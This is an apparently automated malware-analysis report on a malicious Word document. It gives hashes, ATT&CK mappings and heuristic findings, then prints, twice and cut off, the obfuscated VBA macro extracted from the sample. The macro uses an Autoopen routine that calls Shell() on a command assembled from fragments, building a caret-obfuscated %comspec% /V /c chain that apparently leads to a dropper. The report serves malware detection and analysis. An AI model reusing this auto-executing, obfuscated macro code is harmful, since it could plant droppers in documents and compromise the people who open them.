Office (OLE) malware analysis — malicious · a0131c8e5a73dba8

MALICIOUS

Office (OLE)

110.5 KB Created: 2018-06-03 17:54:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 9a7eeaf6ca1821d565e63f194727b0c5 SHA-1: 1791bbb88233300cf06d70d591e293a4d0aa5b92 SHA-256: a0131c8e5a73dba8579f5875aa056d0f4c8f79101af3ec1a0b2923025fa12f3d

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro with an Autoopen subroutine. This subroutine calls a function that uses the Shell() function, indicating an attempt to execute an external command. The obfuscated nature of the script prevents a precise reconstruction of the command, but the presence of Shell() strongly suggests the execution of a second-stage payload. The macro's auto-execution and use of Shell() are common indicators of malware droppers.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17190 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17190 bytes
SHA-256: `6634a82b20da2fd01e92b35dc7ddd26ebb9cdf17a384f2c25fc6a3901d177e90`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZPnNWRYkCCYFsi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function SGjJo() On Error Resume Next For cRSQSc = lzsUs To 69255 ZMlkK = (IbqiM - ChrW(51369 * 72820) * hrFVE * CInt(EKtDo + Sqr(90346)) + 59295 - 10739 / 83861 - CDate(HIUqR - 14836 + 74775 - Hex(QaUBbj / 8261)) + (qBDGmw * Tan(LQOThv))) Next For WCjoa = GvtaE To 31849 iEDjJ = (wEcClP - ChrW(17791 * 40890) * aDoFt * CInt(DRRmI + Sqr(1716)) + 72299 - 91186 / 16531 - CDate(BWtIGM - 59052 + 18897 - Hex(wLtAwY / 33723)) + (zVqlzX * Tan(bmmzA))) Next SGjJo = tItTFvC + Shell(RhfITJwD + Chr(dNHwbhjjfk + vbKeyC + ACwUYIQVHa) + oFluwIi + djSzCPrSRN + TWRPNrS + dfTlLl + mTsAjojmv + jjcXYKMwbiq + nYLsKwr, tPljPOCoTI + 0 + QFwhXSa) For LIUZjt = MCOYi To 45063 pKRSNr = (oaSrC - ChrW(98141 * 80184) * TahJjn * CInt(ZaPfC + Sqr(41484)) + 91090 - 13478 / 33891 - CDate(bcOQV - 36856 + 67612 - Hex(jXiBi / 62437)) + (ZfinqV * Tan(HmlqDi))) Next End Function Sub Autoopen() On Error Resume Next For zsTAja = aQwHw To 149 QUXsi = (cqMTam - ChrW(75984 * 41432) * fiPATi * CInt(OAwFXz + Sqr(27704)) + 69428 - 62680 / 85678 - CDate(lrRNw - 39510 + 94694 - Hex(GfAaz / 75713)) + (zkTrz * Tan(UlFWtd))) Next SGjJo For dccmi = CiLRj To 90603 GcwOa = (SXBdQ - ChrW(79073 * 89991) * QFLrEr * CInt(jiCNsj + Sqr(71259)) + 42825 - 73447 / 37157 - CDate(wuZsmq - 91178 + 85964 - Hex(qbwMz / 75636)) + (lYAZbD * Tan(WzvBi))) Next End Sub Attribute VB_Name = "hAPKcsAPYS" Function oFluwIi() On Error Resume Next For lzziq = pNDwj To 26673 tbBFR = (uFjZNP - ChrW(86683 * 69357) * AQuGwm * CInt(WSoOw + Sqr(2794)) + 23132 - 52786 / 66636 - CDate(EmJzj - 67657 + 17110 - Hex(RGBXlS / 94487)) + (ENnBdO * Tan(aFjQC))) Next HQqjVj = "md c" + "bsdNdGmKp" + "Liu S" + "ir" + "wuqLo" For stHqz = GanRh To 72554 hjRwhW = (Kwwoj - ChrW(69940 * 79928) * jsASG * CInt(YMujlG + Sqr(81362)) + 25478 - 33805 / 92227 - CDate(PAhjJ - 12239 + 3600 - Hex(kpwuTJ / 29105)) + (hquQP * Tan(AJTXSv))) Next LwcAaYXJDcm = "wfjmEWPbO" + " SLQdO" + "XdCizdt" + " & " For bzfCi = jIsZm To 96654 WncRa = (WlIWW - ChrW(59538 * 81863) * AXMmoG * CInt(JrRrks + Sqr(60704)) + 25870 - 80415 / 32815 - CDate(SrINh - 4409 + 92837 - Hex(YiTbIY / 84893)) + (ikfnzr * Tan(NvKZqd))) Next ovBtiz = " %^c^o^m^S^" + "p^E^c^% " + " %^c^o^m" + "^S^" + "p^E" + "^c^% " + " /V " + " /c" + " " + " s" For XSFOMw = nqKqsi To 2603 QJTsMw = (KdKbzv - ChrW(34211 * 43187) * GRhGAW * CInt(LtEvtU + Sqr(95225)) + 9302 - 18398 / 81846 - CDate(iBFzQ - 89595 + 89603 - Hex(bDlzf / 41938)) + (hjbAu * Tan(uPIzIB))) Next izLhEspYv = "et %zYvBCmpnzc" + "ndhwj%=BPvN" + "zCbDBAcYR&&" + "set" + " %kivkdwpoCT%=" + "p&&set %" For qfFRJZ = UXIAmM To 85606 qatYZZ = (NdIvhk - ChrW(74440 * 95171) * ItLRvz * CInt(qGizK + Sqr(52330)) + 51193 - 27110 / 66578 - CDate(zYhFkb - 18199 + 7108 - Hex(cINrC / 65375)) + (KstAa * Tan(tHDRqa))) Next qdlUal = "YhLYkYDDE%=o^w" + "&&" + "set %" + "odpUQfHrDU" + "cmahq%=nvQq" + "mBTDPw&&set" + " %" + "ULfjNSjpVatH" For mCuNkk = PsXRC To 26989 UKcPjR = (QhUiWB - ChrW(60426 * 50892) * Tkjcf * CInt(OAHRT + Sqr(18351)) + 33910 - 40667 / 53381 - CDate(MVYwbC - 20438 + 16737 - Hex(VUZfNj / 66923)) + (rEjSlz * Tan(wcHOzb))) Next AOSHBoTmc = "q%=!%kivk" + "dw" + "poCT%!&&set %" + "zzrzB" + "KQVKzwIQSY%=z" + "uTbWUlfOELifn&" oFluwIi = HQqjVj + LwcAaYXJDcm + ovBtiz + izLhEspYv + qdlUal + AOSHBoTmc End Function Function djSzCPrSRN() On Error Resume Next For MsjJfH = aRaamK To 9204 UtikUa = (vfaXc - ChrW(98787 * 96538) * wKOWIj * CInt(EDbLQn + Sqr(12335)) + 84919 - 99625 / 75754 - CDate(IIOfMH - 47620 + 92302 - Hex(DiIiic / 43977)) + (PXnwHY * Tan(iJIJdo))) Next AwSQZEMuPzd = "&set %cd" + "LizPdMnjlpjj" + "%=e^r&&" + "set %Yfp" + "DCIFB" + "C%=!%YhLYkYD" + "DE%!&& ... (truncated)

SHA-256: 6634a82b20da2fd01e92b35dc7ddd26ebb9cdf17a384f2c25fc6a3901d177e90

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZPnNWRYkCCYFsi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SGjJo()
On Error Resume Next
For cRSQSc = lzsUs To 69255
         ZMlkK = (IbqiM - ChrW(51369 * 72820) * hrFVE * CInt(EKtDo + Sqr(90346)) + 59295 - 10739 / 83861 - CDate(HIUqR - 14836 + 74775 - Hex(QaUBbj / 8261)) + (qBDGmw * Tan(LQOThv)))
Next
For WCjoa = GvtaE To 31849
         iEDjJ = (wEcClP - ChrW(17791 * 40890) * aDoFt * CInt(DRRmI + Sqr(1716)) + 72299 - 91186 / 16531 - CDate(BWtIGM - 59052 + 18897 - Hex(wLtAwY / 33723)) + (zVqlzX * Tan(bmmzA)))
Next
SGjJo = tItTFvC + Shell(RhfITJwD + Chr(dNHwbhjjfk + vbKeyC + ACwUYIQVHa) + oFluwIi + djSzCPrSRN + TWRPNrS + dfTlLl + mTsAjojmv + jjcXYKMwbiq + nYLsKwr, tPljPOCoTI + 0 + QFwhXSa)
For LIUZjt = MCOYi To 45063
         pKRSNr = (oaSrC - ChrW(98141 * 80184) * TahJjn * CInt(ZaPfC + Sqr(41484)) + 91090 - 13478 / 33891 - CDate(bcOQV - 36856 + 67612 - Hex(jXiBi / 62437)) + (ZfinqV * Tan(HmlqDi)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For zsTAja = aQwHw To 149
         QUXsi = (cqMTam - ChrW(75984 * 41432) * fiPATi * CInt(OAwFXz + Sqr(27704)) + 69428 - 62680 / 85678 - CDate(lrRNw - 39510 + 94694 - Hex(GfAaz / 75713)) + (zkTrz * Tan(UlFWtd)))
Next
SGjJo
For dccmi = CiLRj To 90603
         GcwOa = (SXBdQ - ChrW(79073 * 89991) * QFLrEr * CInt(jiCNsj + Sqr(71259)) + 42825 - 73447 / 37157 - CDate(wuZsmq - 91178 + 85964 - Hex(qbwMz / 75636)) + (lYAZbD * Tan(WzvBi)))
Next
End Sub


Attribute VB_Name = "hAPKcsAPYS"
Function oFluwIi()
On Error Resume Next
For lzziq = pNDwj To 26673
         tbBFR = (uFjZNP - ChrW(86683 * 69357) * AQuGwm * CInt(WSoOw + Sqr(2794)) + 23132 - 52786 / 66636 - CDate(EmJzj - 67657 + 17110 - Hex(RGBXlS / 94487)) + (ENnBdO * Tan(aFjQC)))
Next
HQqjVj = "md c" + "bsdNdGmKp" + "Liu S" + "ir" + "wuqLo"
For stHqz = GanRh To 72554
         hjRwhW = (Kwwoj - ChrW(69940 * 79928) * jsASG * CInt(YMujlG + Sqr(81362)) + 25478 - 33805 / 92227 - CDate(PAhjJ - 12239 + 3600 - Hex(kpwuTJ / 29105)) + (hquQP * Tan(AJTXSv)))
Next
LwcAaYXJDcm = "wfjmEWPbO" + " SLQdO" + "XdCizdt" + " &    "
For bzfCi = jIsZm To 96654
         WncRa = (WlIWW - ChrW(59538 * 81863) * AXMmoG * CInt(JrRrks + Sqr(60704)) + 25870 - 80415 / 32815 - CDate(SrINh - 4409 + 92837 - Hex(YiTbIY / 84893)) + (ikfnzr * Tan(NvKZqd)))
Next
ovBtiz = " %^c^o^m^S^" + "p^E^c^%   " + "  %^c^o^m" + "^S^" + "p^E" + "^c^%    " + " /V  " + "       /c" + "      " + "     s"
For XSFOMw = nqKqsi To 2603
         QJTsMw = (KdKbzv - ChrW(34211 * 43187) * GRhGAW * CInt(LtEvtU + Sqr(95225)) + 9302 - 18398 / 81846 - CDate(iBFzQ - 89595 + 89603 - Hex(bDlzf / 41938)) + (hjbAu * Tan(uPIzIB)))
Next
izLhEspYv = "et %zYvBCmpnzc" + "ndhwj%=BPvN" + "zCbDBAcYR&&" + "set" + " %kivkdwpoCT%=" + "p&&set %"
For qfFRJZ = UXIAmM To 85606
         qatYZZ = (NdIvhk - ChrW(74440 * 95171) * ItLRvz * CInt(qGizK + Sqr(52330)) + 51193 - 27110 / 66578 - CDate(zYhFkb - 18199 + 7108 - Hex(cINrC / 65375)) + (KstAa * Tan(tHDRqa)))
Next
qdlUal = "YhLYkYDDE%=o^w" + "&&" + "set %" + "odpUQfHrDU" + "cmahq%=nvQq" + "mBTDPw&&set" + " %" + "ULfjNSjpVatH"
For mCuNkk = PsXRC To 26989
         UKcPjR = (QhUiWB - ChrW(60426 * 50892) * Tkjcf * CInt(OAHRT + Sqr(18351)) + 33910 - 40667 / 53381 - CDate(MVYwbC - 20438 + 16737 - Hex(VUZfNj / 66923)) + (rEjSlz * Tan(wcHOzb)))
Next
AOSHBoTmc = "q%=!%kivk" + "dw" + "poCT%!&&set %" + "zzrzB" + "KQVKzwIQSY%=z" + "uTbWUlfOELifn&"
oFluwIi = HQqjVj + LwcAaYXJDcm + ovBtiz + izLhEspYv + qdlUal + AOSHBoTmc
End Function
Function djSzCPrSRN()
On Error Resume Next
For MsjJfH = aRaamK To 9204
         UtikUa = (vfaXc - ChrW(98787 * 96538) * wKOWIj * CInt(EDbLQn + Sqr(12335)) + 84919 - 99625 / 75754 - CDate(IIOfMH - 47620 + 92302 - Hex(DiIiic / 43977)) + (PXnwHY * Tan(iJIJdo)))
Next
AwSQZEMuPzd = "&set %cd" + "LizPdMnjlpjj" + "%=e^r&&" + "set %Yfp" + "DCIFB" + "C%=!%YhLYkYD" + "DE%!&&
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.